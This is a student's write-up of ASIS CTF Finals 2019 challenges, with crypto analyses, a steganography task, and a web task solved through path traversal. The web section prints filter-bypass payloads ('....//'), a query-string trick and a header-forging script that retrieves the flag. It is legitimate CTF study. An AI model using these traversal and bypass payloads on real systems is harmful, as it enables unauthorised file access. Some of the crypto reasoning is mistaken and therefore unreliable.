ilm0 - formatting fix

[pub/jan/ctf-seminar.git] / writeups / ilm0 / asis.md

# <u>ASIS CTF Finals 2019</u>\r
\r
\r
\r
## Serifin\r
\r
**type:** crypto\r
\r
**description:**\r
\r
A sincere gift for cryptographers, enjoy solving it!\r
\r
___\r
\r
#### Recon\r
\r
We are provided with a code and output. Let's inspect the code!\r
\r
The name "Serifin" does not lead anywhere, it seems to be only a very unusual/made up name.\r
\r
\r
\r
**serifin.py**\r
\r
```python\r
from Crypto.Util.number import *\r
from flag import flag\r
import gmpy2\r
\r
def serifin(a, l):\r
    S, s = a, a\r
    while True:\r
        S += float(a)/float(l)\r
        if S - s < .0001:\r
            return int(S) + 1\r
        else:\r
            s, a = S, float(a)/float(l)\r
\r
def genPrime(nbit):\r
    while True:\r
        p = getPrime(512)\r
        if p % 9 == 1 and p % 27 >= 2:\r
            q = gmpy2.next_prime(serifin(p, 3) + serifin(p, 9) + serifin(p, 27))\r
            if q % 9 == 1 and q % 27 >= 2:\r
                return int(p), int(q)\r
\r
def encrypt(m, n):\r
    m = bytes_to_long(m)\r
    assert m < n\r
    return pow(m, 3, n)\r
\r
nbit = 512\r
p, q = genPrime(nbit)\r
n = p * q\r
c = encrypt(flag, n)\r
\r
print 'c =', c\r
print 'n =', n\r
```\r
\r
We are presented with an unsual crypto scheme. The way the keys are generated seems funky, there might be a vulnerability. Running the code takes a few seconds, there must be some intensive calculations taking place!\r
\r
\r
\r
```python\r
def genPrime(nbit):\r
    while True:\r
        p = getPrime(512)\r
        if p % 9 == 1 and p % 27 >= 2:\r
            q = gmpy2.next_prime(serifin(p, 3) + serifin(p, 9) + serifin(p, 27))\r
            if q % 9 == 1 and q % 27 >= 2:\r
                return int(p), int(q)\r
```\r
\r
An 512 bit long prime number is generated, which is in residue class 2 of 9 and a residue class greater than 1 of 27.  Then the first consecutive prime number is returned after the sum `serifin(p, 3) + serifin(p, 9) + serifin(p, 27)`, this sum should also fulfill the same residue class condition.\r
\r
\r
\r
```python\r
def serifin(a, l):\r
    S, s = a, a\r
    while True:\r
        S += float(a)/float(l)\r
        if S - s < .0001:\r
            return int(S) + 1\r
        else:\r
            s, a = S, float(a)/float(l)\r
```\r
\r
This functions first parameter is always a prime number satisfying the residue class condition, the second parameters are either 3, 9 or 27. A first observation is that the function always returns a number relatively close to the first parameter, the larger the second parameter the closer it is. This seems to be due to the fact that the function "pumps up"  the original prime, in each step increasing it with ratio of this difference to the second parameter.\r
\r
\r
\r
For example the function call serifin(999331 ,27) results in the following steps:\r
\r
> S:  999331\r
> s:  999331\r
> DIFF:  37012.25925925926 # 999331/27\r
>\r
> S:  1036343.2592592592\r
> s:  1036343.2592592592\r
> DIFF:  1370.8244170096023 # 37012/27\r
>\r
> S:  1037714.0836762688\r
> s:  1037714.0836762688\r
> DIFF:  50.771274704059344 # 1370/27\r
>\r
> S:  1037764.8549509728\r
> s:  1037764.8549509728\r
> DIFF:  1.8804175816318276\r
>\r
> S:  1037766.7353685545\r
> s:  1037766.7353685545\r
> DIFF:  0.06964509561599362\r
>\r
> S:  1037766.8050136501\r
> s:  1037766.8050136501\r
> DIFF:  0.0025794479857775415\r
>\r
> S:  1037766.807593098\r
> s:  1037766.807593098\r
> DIFF:  9.553511058435339e-05\r
\r
The function goes on until this difference gets below 0.0001\r
\r
This seems to be similar to how a convergent series behaves. I tried finding some integral expression to be able to generate the values of serifin, but I did not succeed.\r
\r
\r
\r
#### Technical background\r
\r
CTFtime tagged this even with "coppersmith", let's look into what that means:\r
\r
> The most powerful attacks on low public exponent RSA are based on a Copper-smith theorem. \r
\r
[https://www.utc.edu/center-academic-excellence-cyber-defense/pdfs/course-paper-5600-rsa.pdf]\r
\r
> Particular applications of the Coppersmith method for attacking RSA include cases when the public exponent *e* is small or when partial knowledge of the secret key is available.\r
\r
[https://en.wikipedia.org/wiki/Coppersmith%27s_attack]\r
\r
This hinted attack seems to be based on the fact that the public exponent, in this case the second parameter of serifin is always low 3, 9 or 27. Usually larger numbers such as 65537 are used.\r
\r
> There is no known attack against small public exponents such as *e* = 3, provided that the proper padding is used. Coppersmith's Attack has many applications in attacking RSA specifically if the public exponent *e* is small and if the encrypted message is short and not padded. 65537 is a commonly used value for *e*; this value can be regarded as a compromise between avoiding potential  small exponent attacks and still allowing efficient encryptions (or  signature verification).\r
\r
[https://en.wikipedia.org/wiki/RSA_(cryptosystem)]\r
\r
One needs to have a low public and imporper padding to be able to apply Coppersmith's attack.\r
\r
Still, with access to \r
\r
**output.txt**:\r
\r
```\r
c = 78643169701772559588799235367819734778096402374604527417084323620408059019575192358078539818358733737255857476385895538384775148891045101302925145675409962992412316886938945993724412615232830803246511441681246452297825709122570818987869680882524715843237380910432586361889181947636507663665579725822511143923\r
n = 420908150499931060459278096327098138187098413066337803068086719915371572799398579907099206882673150969295710355168269114763450250269978036896492091647087033643409285987088104286084134380067603342891743645230429893458468679597440933612118398950431574177624142313058494887351382310900902645184808573011083971351\r
```\r
\r
one would need to be able to factor n.\r
\r
#### Lessons learned\r
\r
1. Algebra and discrete mathematics is vitally important for crypto challenges\r
2. Coppersmith's attack\r
\r
\r
\r
## Primordial\r
\r
**type:** crypto\r
\r
**description:**\r
\r
To find out the secrets you will have a voyage through the primordial ocean!\r
\r
___\r
\r
#### Recon\r
\r
We are provided with a program code and an output.\r
\r
\r
\r
**primordial_rsa.py**\r
\r
```python\r
import gmpy2\r
from Crypto.Util.number import *\r
import random\r
from flag import flag\r
\r
def primorial(p):\r
    q = 1\r
    s = 1\r
    while q < p:\r
        r = gmpy2.next_prime(q)\r
        if r <= p:\r
            s *= r\r
            q = r\r
        else:\r
            break\r
    return s\r
\r
def gen_prime(nbit):\r
    while True:\r
        s = getPrime(36)\r
        a = primorial(getPrime(random.randint(7, 9)))\r
        b = primorial(getPrime(random.randint(2, 5)))\r
        for r in range(10**3, 3*10**3, 2):\r
            p = s * a // b - r\r
            if gmpy2.is_prime(p) and len(bin(p)[2:]) == nbit:\r
                return int(p)\r
\r
p, q = gen_prime(512), gen_prime(512)\r
e, n = 65537, p * q\r
flag = bytes_to_long(flag)\r
enc = pow(flag, e, n)\r
print 'n =', n\r
print 'enc =', enc\r
```\r
\r
The name of the file reveals us, that it has something to do with the RSA crypto scheme. Two 512 bit long prime numbers are generated, the product of which are then used for encryption of the flag. The encryption seems to use a predefined prime (65537) as the exponent for the power function of python.\r
Common modulus attack? Unfortunately that would need two pieces of cyphertext...\r
\r
A closer look at python documentation:\r
\r
`pow(x, y, z)is equal to x^y % z` (This is the definition of RSA encryption.)\r
\r
which translates to (flag^65537) % (p * q)\r
\r
Again, the way how prime numbers are generated seems odd. Let's examine it!\r
\r
```python\r
def gen_prime(nbit):\r
    while True:\r
        s = getPrime(36)\r
        a = primorial(getPrime(random.randint(7, 9)))\r
        b = primorial(getPrime(random.randint(2, 5)))\r
        for r in range(10**3, 3*10**3, 2):\r
            p = s * a // b - r\r
            if gmpy2.is_prime(p) and len(bin(p)[2:]) == nbit:\r
                return int(p)\r
```\r
\r
Thre "primish" numbers are generated first. The python function getPrime and the primorial function from the code is used:\r
\r
> getPrime(N, randfunc=None)\r
>       getPrime(N:int, randfunc:callable):long Return a random N-bit prime number.\r
\r
Let's believe this functioned does what it's supposed to do, generates us a prime number of arbitrary length.\r
\r
\r
\r
Primorial seems a bit more mysterious at first glance: (The name of the function also reveals us important details about the way it functions, see TD)\r
\r
```python\r
def primorial(p):\r
    q = 1\r
    s = 1\r
    while q < p:\r
        r = gmpy2.next_prime(q)\r
        if r <= p:\r
            s *= r\r
            q = r\r
        else:\r
            break\r
    return s\r
```\r
\r
This function seems to generate products of consecutive prime numbers, until they reach a given limit. This does not seem to be a very good idea, also very vulnerable to brute-force factorization. After a few runs of the function one thing becomes clear though, the primes get "pumped up" quite fast.\r
\r
\r
\r
```python\r
    s = getPrime(36)\r
    a = primorial(getPrime(random.randint(7, 9)))\r
    b = primorial(getPrime(random.randint(2, 5)))\r
```\r
The primorial function is always called with very small starting values, and only a small randomness, so it makes its output quite predictable. Brute-force?\r
\r
\r
\r
The first 36 bit number is a bit more random, but still what we have is 3 dodgy primes. To make the main loop more readable I got rid of expressions and made the precedence clearer with parentheses:\r
\r
```python\r
for r in range(1000, 3000, 2):\r
            p = ((s * a) // b) - r\r
            if gmpy2.is_prime(p) and len(bin(p)[2:]) == nbit:\r
                return int(p)\r
```\r
\r
The 3 generated low-randomness primes are gettin multiplied, then floor-divided and subtracted, There is no randomness involved in this function, a loop is simpy iterated 1000 times and when it has reached a given length then its binary representation is returned with the 2 MSBs removed. Now my thinking was completely directed at a brute-force attack.\r
\r
a, b and r are always known to us (we can generate all possible values):\r
\r
```python\r
import sympy\r
from itertools import product\r
\r
def get_all_nbit_primes(n): #USE ONLY WITH LOW N!\r
        start = 0\r
        l=[]\r
        p=sympy.nextprime(start)\r
        p_len=p.bit_length()\r
\r
        while(p_len <= n):\r
                if(p_len == n):\r
                        l.append(p)\r
                p=sympy.nextprime(p)\r
                p_len=p.bit_length()\r
        \r
        return l\r
\r
def get_all_a():\r
        return get_all_nbit_primes(7) + get_all_nbit_primes(8) + get_all_nbit_primes(9);\r
\r
def get_all_b():\r
        return get_all_nbit_primes(2) + get_all_nbit_primes(3) + get_all_nbit_primes(4) + get_all_nbit_primes(5);\r
\r
def get_all_32bit_primes(): #VERY SLOW\r
        start= 511111111 #heuristic 31bit prime limit\r
        l=[]\r
        p=sympy.nextprime(start)\r
        p_len=p.bit_length()\r
\r
        while(p_len<=32):\r
                if(p_len==32):\r
                        l.append(p)\r
                p=sympy.nextprime(p)\r
                p_len=p.bit_length()\r
\r
def get_all_a_divided_b(a, b):\r
        l=[]\r
        products = list(product(a, b))\r
\r
        for p in products:\r
                l.append(p[0] // p[1])\r
        \r
        return l\r
\r
\r
a = get_all_a()\r
b = get_all_b()\r
\r
print(get_all_a_divided_b(a,b))\r
```\r
\r
I was able to enumerate all a and b values, and their dividend, but generating all 32 primes is computationally too intensive to be solved in reasonable time. I did not find any reliable solution to get access to all those numbers at once.\r
\r
Here I ran into a big barrier, the condition `if gmpy2.is_prime(p) and len(bin(p)[2:]) == nbit` seems harder to fulfill than I thought, even if a,b and r are known, them fulfilling this condition is not always given.\r
\r
After getting stuck I looked online for writeups, where they also managed to get all a//b values, but I later realised that this approach could not work, as in the expression `p = s * a // b - r` the operations '*' and '//' are not interchangeable.\r
\r
[https://github.com/p4-team/ctf/blob/master/2019-11-16-asis-finals/primordial/primordial_rsa.py]\r
\r
#### Technical background\r
\r
Primorial numbers:\r
\r
> A primorial is a product of consecutive prime numbers, starting with the first prime, namely 2.\r
\r
[https://oeis.org/wiki/Primorial]\r
\r
The special property of these numbers makes their factoring relatively easy, which is a serious security threat in an RSA implementation.\r
\r
\r
\r
## Secrets\r
\r
**type:** forensics\r
\r
**description:**\r
\r
An Album Full of Secrets is left for the most curious ones to reveal its secrets!\r
\r
___\r
\r
#### Recon\r
\r
We are given an archive which contains a folder with various images of contemporary actors. There are 15 images, each are named after the depicted actor, nothing seems out of the ordinary, yet. The file details do not reveal anything out of the ordinary, the photos have different sizes.\r
\r
My first idea was to look at all the images with the steganography tools https://georgeom.net/StegOnline/upload and Stegsolve, but neither proved to be successful. I looked at the more detailed image data with exiftool but there was nothing unusual.\r
\r
\r
\r
The first revelations came after using the unix tool `strings`: \r
\r
almost all of the images contained an unusual string: "no SecDrive0", which is not part of the png specification. Also the image `rooney.png` included a base64 looking string at the end.\r
\r
```\r
VGhlIHBhc3N3b3JkIGlzOiBhdGFsbWF0YWw=\r
```\r
\r
Decrypting it gives an interesting result: "The password is: atalmatal"\r
\r
I tried interpreting it, maybe the images have some kind of encryption. I tried opening them with different software, but nothing worked.\r
\r
I also tried looking around the web for "atalmatal": it seems to be an Iranian children's song. This is not very helpful!\r
\r
I tried looking around for other base64 encoded strings, but I did not find anything.\r
\r
I looked at a writeup, apparently one needs the steganography software "albumfs" to be able to interpret the images. \r
[https://github.com/mgeitz/albumfs]\r
[https://github.com/p4-team/ctf/blob/master/2019-11-16-asis-finals/secrets/README.md]\r
\r
I could not recreate the way how the outhers could have found it, they write\r
\r
> after some extensive googling\r
\r
maybe it means some special proficiency in using google! \r
\r
They managed to get the flag after debugging and fixing a segfault in the software.\r
\r
#### Technical background\r
\r
AlbumFS is a steganography file system implementation:\r
\r
> Create, access, and modify a key encrypted LSB steganography filesystem in user space using a directory of PNG images.  \r
\r
[https://github.com/mgeitz/albumfs]\r
\r
The LSB of each byte making up the images is modified, data is hidden there. That means that for our album of 11.6 MB, 1.45 MB worth of data can be hidden.\r
\r
Steganographic file systems seem to have been existing for a long time although not widely used, the most known being StegFS. It can hide data among random "gibberish" looking byte chunks.\r
\r
#### Lessons learned\r
\r
- Google skills are important!\r
- Steganography exists in a lot of applications \r
\r
\r
\r
## Bit game\r
\r
**type:** crypto\r
\r
**description:**\r
\r
A game for grown ups, just play with bits to find out the sought after  secret.\r
\r
___\r
\r
#### Recon\r
\r
We are provided with a python code and an output again. I started to notice a pattern here, as to how ASIS crypto challenges are built up. I am expecting some lousy key-generation function involving primes.\r
\r
\r
\r
**single_bits.py**\r
\r
```python\r
import random\r
from Crypto.Util.number import *\r
from flag import flag\r
\r
def gen_rand(nbit, l):\r
    R = []\r
    while True:\r
        r = random.randint(0, nbit-1)\r
        if r not in R:\r
            R.append(r)\r
            if len(R) == l:\r
                break\r
    R.sort()\r
    rbit = '1'\r
    for i in range(l-1):\r
        rbit += (R[i+1] - R[i] - 1) * '0' + '1'\r
    rbit += (nbit - R[-1] - 1) * '0'\r
    return int(rbit, 2)\r
\r
def genkey(p, l):\r
    n = len(bin(p)[2:])\r
    f, skey = gen_rand(n, l), gen_rand(n, l)\r
    pkey = f * inverse(skey, p) % p\r
    return (p, pkey), skey\r
\r
def encrypt(msg, pkey):\r
    p, g = pkey\r
    msg, enc, n = bytes_to_long(msg), [], len(bin(p)[2:])\r
    for b in bin(msg)[2:]:\r
        s, t = gen_rand(n, l), gen_rand(n, l)\r
        c = (s * g + t) % p\r
        if b == '0':\r
            enc.append((c, t))\r
        else:\r
            enc.append((p-c, t))\r
    return enc\r
    \r
p = 862718293348820473429344482784628181556388621521298319395315527974911\r
l = 5\r
\r
pkey, skey = genkey(p, l)\r
enc = encrypt(flag, pkey)\r
H = pkey[1] ** 2 % p\r
print 'H =', H\r
print 'enc =', enc\r
```\r
\r
Only what we expected, we have an unusual take on the RSA-scheme with an unusual way of generating keys.\r
\r
\r
\r
The first thing that stands out is the fact that there is a hard-coded very large prime included. \r
\r
`p = 862718293348820473429344482784628181556388621521298319395315527974911`\r
\r
A quick google search tells us its a Mersenne number (see TD), a number with a special quality, it can be written as 2^n-1, in this case n = 229, this might prove useful later.\r
\r
For a long time I was under the impression and trying to think out solutions based on the fact, that all Mersenne numbers are primes, but this proved to be false. p is not a prime!\r
\r
[https://www.mersenne.org/primes/]\r
\r
[https://www.wikidata.org/wiki/Q67211903]\r
\r
This will result in n being a constant number, it always equals to 229.\r
\r
\r
\r
Taking a closer look at the functions:\r
\r
```python\r
def gen_rand(nbit, l):\r
    R = []\r
    while True:\r
        r = random.randint(0, nbit-1)\r
        if r not in R:\r
            R.append(r)\r
            if len(R) == l:\r
                break\r
    R.sort()\r
    rbit = '1'\r
    for i in range(l-1):\r
        rbit += (R[i+1] - R[i] - 1) * '0' + '1'\r
    rbit += (nbit - R[-1] - 1) * '0'\r
    return int(rbit, 2)\r
\r
def genkey(p, l):\r
    n = len(bin(p)[2:])\r
    f, skey = gen_rand(n, l), gen_rand(n, l)\r
    pkey = (f * inverse(skey, p)) % p\r
    return (p, pkey), skey\r
```\r
\r
The definition of the inverse function from the Crypto.Util.number library:\r
\r
```\r
inverse(u, v)\r
      inverse(u:long, v:long):long Return the inverse of u mod v.\r
```\r
\r
Two random numbers are generated, these are 2 bits shorter than the prime p. The inverse residue is multiplied with the first generated number and the modulo of restclass p is taken from their product. \r
\r
gen_rand does some very unusual bitwise operations with sorted congruents of the length.\r
\r
I tried factoring p with the sympy library, but it took too long, I think to be able to start off an efficient solution, one needs to be able to access the factors of p.\r
\r
#### Technical background\r
\r
Mersenne numbers:\r
\r
> Mersenne numbers are integers of the form  Mn = 2^n-1 (many authors require that the exponent *n* be a prime.  They are of interest because the Mersenne primes (prime Mersenne  numbers) are among the oldest and most studied of all primes! \r
\r
[https://primes.utm.edu/glossary/page.php?sort=MersenneNumber]\r
\r
Mersenne numbers seem interesting, but their use in cryptography cannot be that extensive, as if they are recognized, their factoring becomes unambigous.\r
\r
\r
\r
## Protected area 1\r
\r
**type:** web\r
\r
**description:**\r
\r
We have built an area protected by a hard password \r
\r
Note: DO NOT Brute force the server (the rate limit will ban you), the question may need an OFFLINE brute-force!\r
\r
___\r
\r
#### Recon + solution\r
\r
We are given access to a website which includes a JS file:\r
\r
```js\r
var file_check = function(file){\r
\r
    $.ajax({\r
        url: '/check_perm/readable/',\r
        data: {'file': file}\r
    }).done(function(data){\r
        if (data == "True") {\r
            file_read(file)\r
        }else{\r
            console.log('fail')\r
        }\r
    })\r
}\r
\r
var file_read = function(file){\r
\r
    $.ajax({\r
        url: '/read_file/',\r
        data: {'file': file}\r
    }).done(function(data){\r
        update_page(data)\r
    })\r
\r
    return\r
}\r
\r
var update_page = function(text){\r
    $("#t").append(text)\r
}\r
\r
$(document).ready(function() {\r
    console.log("ready!");\r
\r
    file_check('public.txt');\r
});\r
```\r
\r
The file seems to be an AJAX interface connecting to a backend service.\r
\r
We are given the opportunity to open files, if they are present in the '/check_perm/readable/' folder.\r
\r
Two GET requests are made immediately after opening the webpage:\r
\r
```\r
http://66.172.33.148:8008/check_perm/readable/?file=public.txt\r
http://66.172.33.148:8008/read_file/?file=public.txt\r
```\r
\r
This gives us an idea how the basic structure of the website is built up, two folders, '/check_perm/readable' and '/read_file'. We easily recognize that these requests result from the function call `file_check('public.txt');` which firsts checks if the file is readable, then presents us the results.\r
\r
The logical thing was to try some form of directory traversal, but our `../` get filtered out.\r
\r
So, requests like:\r
\r
```\r
http://66.172.33.148:8008/read_file/?file=../files/public.txt\r
```\r
\r
do not work and result in an error.\r
\r
I felt stuck here, but in the mattermost channel I saw that others have worked on the challenge too and were trying to solve it, here someone advised to try to outwit the filtering.\r
\r
After some playing around and reading the chat:\r
\r
```\r
http://66.172.33.148:8008/read_file/?file=....//files/public.txt\r
```\r
\r
worked, and we get the same result, as when loading the webpage.\r
\r
The only remaining problem was being restricted to .txt files. I tried tricking the engine by sending requests like "public.x.txt" and "public.txt.txt" but I received security errors. My next idea was to try some kind of escape sequence, so that the solution does not get checked, but I could not find any viable way of implementing it. \r
\r
The breakthrough came when we recognized, that when sending extra parameters like:\r
\r
```\r
file=....//files/public&extra_param?public.txt\r
```\r
\r
 only the extra_param got filtered!\r
\r
After reading out on the mattermost chat, I managed to get access to:\r
\r
**app.py**:\r
\r
```python\r
from flask import Flask\r
\r
def create_app():\r
    """Construct the core application."""\r
    app = Flask(__name__, instance_relative_config=False)\r
\r
    with app.app_context():\r
        # Imports\r
        from . import api        return app\r
```\r
\r
and **api.py**:\r
\r
```python\r
from flask import current_app as app\r
from flask import request, render_template, send_file\r
from .functions import *\r
from config import *\r
import os\r
\r
@app.route('/check_perm/readable/', methods=['GET'])\r
def app_check_file() -> str:\r
    try:\r
        file = request.args.get("file")\r
\r
        file_path = os.path.normpath('application/files/{}'.format(file))\r
        with open(file_path, 'r') as f:\r
            return str(f.readable())\r
    except:\r
        return '0'\r
\r
@app.route('/read_file/', methods=['GET'])\r
def app_read_file() -> str:\r
    \r
    file = request.args.get("file").replace('../', '')\r
    qs = request.query_string.decode('UTF-8')\r
\r
    if qs.find('.txt') != (len(qs) - 4):\r
        return 'security'\r
    \r
    try:\r
        return send_file('files/{}'.format(file))\r
    except Exception as e:\r
        return "500"\r
\r
@app.route('/protected_area_0098', methods=['GET'])\r
@check_login\r
def app_protected_area() -> str:\r
    return Config.FLAG\r
\r
@app.route('/', methods=['GET'])\r
def app_index() -> str:\r
    return render_template('index.html')\r
\r
@app.errorhandler(404)\r
def not_found_error(error) -> str:\r
    return "Error 404"\r
```\r
\r
We got to know, that the serves is running a Flask REST endpoint and that the flag rests in '/protected_area_0098', but this "area" has an additional layer of protection. Now we need to somehow get access to it! It also became revealed that a python  file containing functions used and a config file is used.\r
\r
**config.py**:\r
\r
```python\r
import os\r
\r
class Config:\r
    """Set Flask configuration vars from .env file."""\r
\r
    # general config\r
    FLAG       = os.environ.get('FLAG')\r
    SECRET     = "s3cr3t"\r
    ADMIN_PASS = "b5ec168843f71c6f6c30808c78b9f55d"\r
```\r
\r
**functions.py**:\r
\r
```python\r
from flask import request, abort\r
from functools import wraps\r
import traceback, os, hashlib\r
from config import *\r
\r
def check_login(f):\r
    """\r
    Wraps routing functions that require a user to be logged in\r
    """\r
    @wraps(f)\r
    def wrapper(*args, **kwds):\r
        try:\r
            ah = request.headers.get('ah')\r
\r
            if ah == hashlib.md5((Config.ADMIN_PASS + Config.SECRET).encode("utf-                     8")).hexdigest():\r
                return f(*args, **kwds)\r
            else:\r
                return abort(403)\r
\r
        except:\r
            return abort(403)\r
        \r
    return wrapper\r
```\r
\r
The additional protection is an admin password, which we to calculate. And then send as an "ah" header field. Fortunately we have access to the hash and the secret.\r
\r
Armed with this information we can construct an exploit to get the flag!\r
\r
```python\r
import hashlib\r
import requests\r
\r
a_pass = hashlib.md5("b5ec168843f71c6f6c30808c78b9f55d" + "s3cr3t").hexdigest()\r
url = 'http://66.172.33.148:8008/protected_area_0098'\r
res = requests.get("http://66.172.33.148:8008/protected_area_0098", \r
                   headers={"ah" : a_pass})\r
\r
print(res.text) \r
```\r
\r
ASIS{f70a0203d638a0c90a490ad46a94e394}\r
\r
#### Lessons learned\r
\r
- Using the Kali tool DirBuster